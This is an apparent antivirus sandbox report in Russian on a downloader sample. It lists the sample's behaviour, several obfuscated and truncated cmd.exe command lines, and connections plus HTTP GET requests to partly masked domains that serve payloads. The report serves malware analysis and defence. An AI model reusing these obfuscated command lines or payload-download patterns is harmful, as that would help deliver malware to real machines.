Техническая информация
Вредоносные функции
Загружает файлы и запускает на исполнение.
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /c FOR ; /F ; " delims=fQG tokens= 1 " , %^C , ; IN , ; ( , ' ; ; ^^FT^^y^^Pe ; ^| ; FINdst^^R ; , mdf^^i ' , ; ) ; ^d^O ; %^C, ; M8e7KW/vn^*^eD$= ^ , 574eR1NuM/r " , ( ...
Сетевая активность
Подключается к
- 'ol####lysforum.com':80
- 'tr###2000.net':80
- 'in###uc.com.br':80
- 'ri##na.eu':80
- 'ri##na.eu':443
- 'mf###za.com.br':80
TCP
Запросы HTTP GET
- http://tr###2000.net/images/cheesephotos/rUmv4a/
- http://in###uc.com.br/HdmvjrU/
- http://ri##na.eu/lNEjji/
- http://mf###za.com.br/rtkBL2D/
Другие
- 'ri##na.eu':443
UDP
- DNS ASK ol####lysforum.com
- DNS ASK tr###2000.net
- DNS ASK in###uc.com.br
- DNS ASK ri##na.eu
- DNS ASK mf###za.com.br
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c FOR ; /F ; " delims=fQG tokens= 1 " , %^C , ; IN , ; ( , ' ; ; ^^FT^^y^^Pe ; ^| ; FINdst^^R ; , mdf^^i ' , ; ) ; ^d^O ; %^C, ; M8e7KW/vn^*^eD$= ^ , 574eR1NuM/r " , ( ...' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c ^FT^y^Pe | FINdst^R mdf^i
- '<SYSTEM32>\cmd.exe' /S /D /c" FTyPe "
- '<SYSTEM32>\findstr.exe' mdfi
- '<SYSTEM32>\cmd.exe' , ; M8e7KW/vn*eD$= , 574eR1NuM/r " , ( , (s^eT ^ ' ^ =^qoa^kNrbnsh.x^cv0+d^Cz;^E\pge^{^:l=X2Bf76Ot^)^w^H4D^YPyF^@^/L ^(-W'Sji,umU}^$) , ; , )&& ; ; FOR , %^r ; IN , ; (^...
